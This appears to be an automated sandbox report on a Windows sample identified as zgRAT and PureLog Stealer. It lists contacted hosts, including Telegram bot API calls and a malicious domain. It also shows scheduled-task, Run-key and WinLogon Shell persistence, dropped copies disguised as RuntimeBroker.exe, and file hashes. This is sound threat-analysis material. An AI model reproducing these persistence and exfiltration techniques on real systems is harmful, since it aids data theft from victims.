                                                high
                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000001E.00000002.1794173994.000001A757308000.00000004.00000800.00020000.00000000.sdmptrue
                                                • URL Reputation: malware
                                                unknown
                                                https://api.telegram.org/botW4tW72sfAD.exe, 00000000.00000002.1734047255.0000000003815000.00000004.00000800.00020000.00000000.sdmp, W4tW72sfAD.exe, 00000000.00000002.1766639664.000000001B862000.00000002.00000001.01000000.00000000.sdmp, juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2085622386.00000000037DD000.00000004.00000800.00020000.00000000.sdmp, juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2085622386.00000000037C6000.00000004.00000800.00020000.00000000.sdmp, juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2085622386.000000000369B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000017.00000002.1826108573.000002B82F5C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1821605110.0000023E23358000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1821229291.0000014AD0EB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1786007812.0000013AC39B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1794173994.000001A757308000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000001E.00000002.1794173994.000001A757308000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://ipinfo.ioW4tW72sfAD.exe, 00000000.00000002.1734047255.0000000003790000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://contoso.com/Licensepowershell.exe, 0000001E.00000002.2908253954.000001A767156000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://crl.micpowershell.exe, 0000001A.00000002.3124943366.0000014AE8DD7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://contoso.com/Iconpowershell.exe, 0000001E.00000002.2908253954.000001A767156000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=XrKvE5hfPM.49.drfalse
                                                          high
                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=XrKvE5hfPM.49.drfalse
                                                            high
                                                            https://www.ecosia.org/newtab/XrKvE5hfPM.49.drfalse
IP | Domain | Country | ASN | ASN Name | Malicious
34.117.186.192 | ipinfo.io | United States | 139070 | GOOGLE-AS-APGoogleAsiaPacificPteLtdSG | false
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
172.67.189.92 | unknown | United States | 13335 | CLOUDFLARENETUS | false
104.21.57.61 | minecrafthyipixel.xyz | United States | 13335 | CLOUDFLARENETUS | true

IP
127.0.0.1
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1428727
Start date and time: 2024-04-19 13:41:05 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 12m 55s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 55
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: W4tW72sfAD.exe
renamed because original name is a hash value
Original Sample Name: 9026338FCE277581062754CAB87462E7.exe
Detection: MAL
Classification: mal100.spre.troj.spyw.expl.evad.winEXE@45/93@4/5
EGA Information:
• Successful, ratio: 57.1%
HCA Information:
• Successful, ratio: 59%
• Number of executed functions: 326
• Number of non-executed functions: 10
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, SIHClient.exe, conhost.exe, schtasks.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 23.201.212.130
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target juptXkyeRvGsIZrQGeVEsrnWhD.exe, PID 8172 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 3668 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 5104 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7140 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7208 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7248 because it is empty
• HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: W4tW72sfAD.exe
Time | Type | Description
12:41:58 | Task Scheduler | Run new task: juptXkyeRvGsIZrQGeVEsrnWhD path: "C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
12:41:58 | Task Scheduler | Run new task: juptXkyeRvGsIZrQGeVEsrnWhDj path: "C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
12:41:58 | Task Scheduler | Run new task: RuntimeBroker path: "C:\Users\Public\Downloads\RuntimeBroker.exe"
12:41:58 | Task Scheduler | Run new task: RuntimeBrokerR path: "C:\Users\Public\Downloads\RuntimeBroker.exe"
12:42:00 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run juptXkyeRvGsIZrQGeVEsrnWhD "C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
12:42:11 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Users\Public\Downloads\RuntimeBroker.exe"
12:42:19 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run juptXkyeRvGsIZrQGeVEsrnWhD "C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
12:42:28 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Users\Public\Downloads\RuntimeBroker.exe"
12:42:37 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run juptXkyeRvGsIZrQGeVEsrnWhD "C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
12:42:45 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Users\Public\Downloads\RuntimeBroker.exe"
12:43:03 | Autostart | Run: WinLogon Shell "C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
12:43:11 | Autostart | Run: WinLogon Shell "C:\Users\Default User\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
12:43:21 | Autostart | Run: WinLogon Shell "C:\Users\Public\Downloads\RuntimeBroker.exe"
12:43:29 | Autostart | Run: WinLogon Shell "C:\Program Files (x86)\internet explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
12:43:38 | Autostart | Run: WinLogon Shell "C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
13:41:58 | API Interceptor | 30x Sleep call for process: W4tW72sfAD.exe modified
13:42:02 | API Interceptor | 168x Sleep call for process: powershell.exe modified
13:42:33 | API Interceptor | 2060411x Sleep call for process: juptXkyeRvGsIZrQGeVEsrnWhD.exe modified
13:42:34 | API Interceptor | 2x Sleep call for process: svchost.exe modified
                                                                                                                • 104.21.75.8
                                                                                                                igIKGnfg87.elfGet hashmaliciousMiraiBrowse
                                                                                                                • 104.21.75.8
                                                                                                                XKVTy6USx5.elfGet hashmaliciousMiraiBrowse
                                                                                                                • 104.21.75.8
                                                                                                                Play_NewMessage_17April2024_Audio.htmGet hashmaliciousUnknownBrowse
                                                                                                                • 104.17.2.184
                                                                                                                Invoice No. 03182024.docxGet hashmaliciousRemcosBrowse
                                                                                                                • 172.67.215.45
                                                                                                                $RWRW8GN.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 104.22.1.235
                                                                                                                GOOGLE-AS-APGoogleAsiaPacificPteLtdSGs.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 34.117.186.192
                                                                                                                s.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 34.117.186.192
                                                                                                                s2dwlCsA95.exeGet hashmaliciousRisePro StealerBrowse
                                                                                                                • 34.117.186.192
                                                                                                                Sp#U251c#U0434ti.exeGet hashmaliciousDanaBotBrowse
                                                                                                                • 34.117.186.192
                                                                                                                Sp#U251c#U0434ti.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 34.117.186.192
                                                                                                                SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeGet hashmaliciousAmadey, RedLine, RisePro StealerBrowse
                                                                                                                • 34.117.186.192
                                                                                                                lQV0SgKoqe.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 34.117.118.44
                                                                                                                lQV0SgKoqe.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 34.117.118.44
                                                                                                                s.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 34.117.186.192
                                                                                                                SecuriteInfo.com.Win64.Evo-gen.32634.31069.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                                                                                                • 34.117.186.192
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Users\user\Desktop\BazpdGXT.log | 8CDSiIApNr.exe | | malicious | DCRat, PureLog Stealer, zgRAT | |
C:\Users\user\Desktop\BazpdGXT.log | 3otr19d5Oq.exe | | malicious | DCRat, PureLog Stealer, zgRAT | |
C:\Users\user\Desktop\BazpdGXT.log | idYLOQOVSi.exe | | malicious | DCRat | |
C:\Users\user\Desktop\BazpdGXT.log | ZAF4Dsu737.exe | | malicious | DCRat, PureLog Stealer, zgRAT | |
C:\Users\user\Desktop\BazpdGXT.log | mbsPX9l9Ge.exe | | malicious | DCRat, PureLog Stealer, zgRAT | |
C:\Users\user\Desktop\BazpdGXT.log | nxs4if1qOO.exe | | malicious | DCRat | |
C:\Users\user\Desktop\BazpdGXT.log | crsa4bZhdH.exe | | malicious | DCRat, PureLog Stealer, zgRAT | |
C:\Users\user\Desktop\BazpdGXT.log | C9EBSy2FG0.exe | | malicious | DCRat | |
C:\Users\user\Desktop\BazpdGXT.log | y3HHIzAW6R.exe | | malicious | DCRat | |
C:\Users\user\Desktop\BazpdGXT.log | SecuriteInfo.com.HEUR.Trojan.MSIL.Agent.gen.4285.13890.exe | | malicious | DCRat | |
                                                                                                                                    Process:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    File Type:ASCII text, with very long lines (857), with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):857
                                                                                                                                    Entropy (8bit):5.87587225954941
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24:vQ1CzqXTp4eRjIfXOGLjA7nlE+HX2hMHIZOZVXQZ1Hp:vQrjynLjA7CRMHISIHp
                                                                                                                                    MD5:20AF770A33983F64E4A34CB4D1D9EC20
                                                                                                                                    SHA1:832430EDC0F3A4ABDDB0A692091AE35B00EB2FDE
                                                                                                                                    SHA-256:E31E28EA16C90F10B56878DF37D66EB9086F3BC295553500942C02BDD989DF7C
                                                                                                                                    SHA-512:D987DC72714DAF507D6819182E0F299F1A02DAB203B6B2AD7FDA998CF77AD4406C46D2D41F2D3533572A62B85774AB7994D5E5011D98AF17849656A45C42C159
                                                                                                                                    Malicious:false
                                                                                                                                    Process:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):2079744
                                                                                                                                    Entropy (8bit):7.6230020226991435
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24576:aSLLyDf1/7HnFZnA83kJTwJiYYfbeQYPXI3IDyVZqVhTEmkz3UzKzMlJ6wwLI:aSXM/dUJ8SDeQYvI3IGmhTZYlwlJJM
                                                                                                                                    MD5:9026338FCE277581062754CAB87462E7
                                                                                                                                    SHA1:191B8D92C18B84FDEF03F691583D8B89598CB7DA
                                                                                                                                    SHA-256:5565710131F195B46FB7C0B124D16DF72EC5E0AAFDD22590EAFF7885AEAD636F
                                                                                                                                    SHA-512:8BE58979EEC71FE69408AA621E756D76B58DB496DA456DAD533FB88AD800ECF8D8E5933BAEDDA4742C1DC4E5095F8FE7C3071F0339B056F54A378ADB08908FCA
                                                                                                                                    Malicious:true
                                                                                                                                    Yara Hits:
                                                                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe, Author: Joe Security
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 68%
                                                                                                                                    Process:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):26
                                                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                    Process:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    File Type:ASCII text, with very long lines (681), with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):681
                                                                                                                                    Entropy (8bit):5.897538285190348
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12:hpyXVDUONcBNXmfui84xIqKQUNB9xExLU+pWojSBdgjG2uItNbOq2UUfkw3dUucw:ILxxlUNbxEBf1GzgaFQkuUd3xGCmW
                                                                                                                                    MD5:EDF5011B73DDC06EA24A0CD334C438B5
                                                                                                                                    SHA1:A7026A10113F6D336FB6C46731598822763A93DF
                                                                                                                                    SHA-256:7DC2537D767C8468C086D14B7D65A6B3FB31777FC5592BADC97A00947B3CE4F4
                                                                                                                                    SHA-512:36B53B762651913727B6B99DCC24C4AFF7754C274D6D2CD536C5F43E04024870B842E0D8718E4257C608D71EB8B83DC52E556990EAD8DA34307D573C2DBBCB75
                                                                                                                                    Malicious:false
                                                                                                                                    Process:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):2079744
                                                                                                                                    Entropy (8bit):7.6230020226991435
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24576:aSLLyDf1/7HnFZnA83kJTwJiYYfbeQYPXI3IDyVZqVhTEmkz3UzKzMlJ6wwLI:aSXM/dUJ8SDeQYvI3IGmhTZYlwlJJM
                                                                                                                                    MD5:9026338FCE277581062754CAB87462E7
                                                                                                                                    SHA1:191B8D92C18B84FDEF03F691583D8B89598CB7DA
                                                                                                                                    SHA-256:5565710131F195B46FB7C0B124D16DF72EC5E0AAFDD22590EAFF7885AEAD636F
                                                                                                                                    SHA-512:8BE58979EEC71FE69408AA621E756D76B58DB496DA456DAD533FB88AD800ECF8D8E5933BAEDDA4742C1DC4E5095F8FE7C3071F0339B056F54A378ADB08908FCA
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 68%
                                                                                                                                    Process:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):26
                                                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x4bf9faa4, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1310720
                                                                                                                                    Entropy (8bit):0.4221619743931657
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:1536:pSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:paza/vMUM2Uvz7DO
                                                                                                                                    MD5:81AC2D5E03E90A887B7956BB62A450C5
                                                                                                                                    SHA1:D1DFFB20A6167E9393E543A81C590907FC6C78B1
                                                                                                                                    SHA-256:0C8A0E0D489BC02BF54CA594AA77000C84DC64D93D40B9F43EB7FDC27E7BEC6F
                                                                                                                                    SHA-512:92877750BCDF1A04FA10AFD4508B055393FA292AE4CEF2DFE2A88343B263983CF72041E9571FC453D54B115019EBDDF4F9BEB35762CC7B8DC6175B7FB8A9F000
                                                                                                                                    Malicious:false
                                                                                                                                    Process:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):84
                                                                                                                                    Entropy (8bit):5.067812887467078
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:JQvAo43kqD54ogkfd3pPUJKczRKIOR26EQrn:evAo8rg+JwKCRSVr
                                                                                                                                    MD5:1AEAF6114CB060B06A50C30AB0D9E798
                                                                                                                                    SHA1:5593B70DEE931E7C25105DEA254920B3B177A966
                                                                                                                                    SHA-256:9E75F9C9CD9C866ADEB7267C15EF5853D56869AFEF7EE0E5A7EA25F7DD084B59
                                                                                                                                    SHA-512:9E69D895B33CCA0E28C16896BA959F3060601DAB94CB5475840CB31C8BF4B35B61CD48E1CF2383AD605EAAA5DC3B5BE3763F91CE74BF168045071E8595A658EE
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:7qKkZuw56GOvutFMhOycAOcqVpFaMKAQIdy5Ny6YxYCoWmNmq8xTTTDtOdOuoVtvF7mQ4J8tSapmMxTtcduN
                                                                                                                                    Process:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):2079744
                                                                                                                                    Entropy (8bit):7.6230020226991435
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24576:aSLLyDf1/7HnFZnA83kJTwJiYYfbeQYPXI3IDyVZqVhTEmkz3UzKzMlJ6wwLI:aSXM/dUJ8SDeQYvI3IGmhTZYlwlJJM
                                                                                                                                    MD5:9026338FCE277581062754CAB87462E7
                                                                                                                                    SHA1:191B8D92C18B84FDEF03F691583D8B89598CB7DA
                                                                                                                                    SHA-256:5565710131F195B46FB7C0B124D16DF72EC5E0AAFDD22590EAFF7885AEAD636F
                                                                                                                                    SHA-512:8BE58979EEC71FE69408AA621E756D76B58DB496DA456DAD533FB88AD800ECF8D8E5933BAEDDA4742C1DC4E5095F8FE7C3071F0339B056F54A378ADB08908FCA
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 68%
                                                                                                                                    Process:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):26
                                                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                    Process:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    File Type:ASCII text, with very long lines (704), with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):704
                                                                                                                                    Entropy (8bit):5.890852340568357
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12:rqwJMZQUdTHVAmaEpa8HE8zk7isWZ0wROk11g0RMRrrwue72oyB:rq8/ITHVx7M8zkvDwdg0RMzemB
                                                                                                                                    MD5:45B4D9A34798786259052634A511A766
                                                                                                                                    SHA1:B45D045BA7A43AA0CAAAE8D3146023758EE082F6
                                                                                                                                    SHA-256:83E7FA937FC79539B8981CA3362C3352F443E42AF6A7D97503DF959A84DB44DF
                                                                                                                                    SHA-512:1E87A1698EEFD33584088A3D734CAA39DFB5BCD02F492D645794D3B5D95D848BEB29B4B9F36C1FA7848F5A89EB5AD95FB759042C6C539FF9E9C98CFC7F83F23A
                                                                                                                                    Malicious:false
                                                                                                                                    Process:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):2079744
                                                                                                                                    Entropy (8bit):7.6230020226991435
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24576:aSLLyDf1/7HnFZnA83kJTwJiYYfbeQYPXI3IDyVZqVhTEmkz3UzKzMlJ6wwLI:aSXM/dUJ8SDeQYvI3IGmhTZYlwlJJM
                                                                                                                                    MD5:9026338FCE277581062754CAB87462E7
                                                                                                                                    SHA1:191B8D92C18B84FDEF03F691583D8B89598CB7DA
                                                                                                                                    SHA-256:5565710131F195B46FB7C0B124D16DF72EC5E0AAFDD22590EAFF7885AEAD636F
                                                                                                                                    SHA-512:8BE58979EEC71FE69408AA621E756D76B58DB496DA456DAD533FB88AD800ECF8D8E5933BAEDDA4742C1DC4E5095F8FE7C3071F0339B056F54A378ADB08908FCA
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 68%
                                                                                                                                    Process:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):26
                                                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                    Process:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    File Type:ASCII text, with very long lines (606), with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):606
                                                                                                                                    Entropy (8bit):5.900612675596578
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12:2FgSsn8ozx1Lzbdc/2SrafCrcNJud7HdOvm0W+lQt:wm8wWPOqrWY9Smx
                                                                                                                                    MD5:B5487304446382E0241C467350F1F428
                                                                                                                                    SHA1:C64F40F65C4F3475CEDE9427C1B34CC68B78AFB0
                                                                                                                                    SHA-256:3A1587FD04ADA1DAFC3DB374BAFA3E2E6C74970F8D4D3828A69CB4EEB7838A2C
                                                                                                                                    SHA-512:663CEA27766C6936C2D57FC19614F12BD7873DF673A50D5731A977FED5B2A17F9F7C214358C5011FFE196F8A2A761E9F4BCA4C7D2F9B84DFDD55B6F7CC313A4E
                                                                                                                                    Malicious:false
                                                                                                                                    Process:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):2079744
                                                                                                                                    Entropy (8bit):7.6230020226991435
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24576:aSLLyDf1/7HnFZnA83kJTwJiYYfbeQYPXI3IDyVZqVhTEmkz3UzKzMlJ6wwLI:aSXM/dUJ8SDeQYvI3IGmhTZYlwlJJM
                                                                                                                                    MD5:9026338FCE277581062754CAB87462E7
                                                                                                                                    SHA1:191B8D92C18B84FDEF03F691583D8B89598CB7DA
                                                                                                                                    SHA-256:5565710131F195B46FB7C0B124D16DF72EC5E0AAFDD22590EAFF7885AEAD636F
                                                                                                                                    SHA-512:8BE58979EEC71FE69408AA621E756D76B58DB496DA456DAD533FB88AD800ECF8D8E5933BAEDDA4742C1DC4E5095F8FE7C3071F0339B056F54A378ADB08908FCA
                                                                                                                                    Malicious:true
                                                                                                                                    Yara Hits:
                                                                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\Public\Downloads\RuntimeBroker.exe, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Public\Downloads\RuntimeBroker.exe, Author: Joe Security
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 68%
                                                                                                                                    Process:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):26
                                                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                    Process:C:\Users\Public\Downloads\RuntimeBroker.exe
                                                                                                                                    File Type:CSV text
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):847
                                                                                                                                    Entropy (8bit):5.354334472896228
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
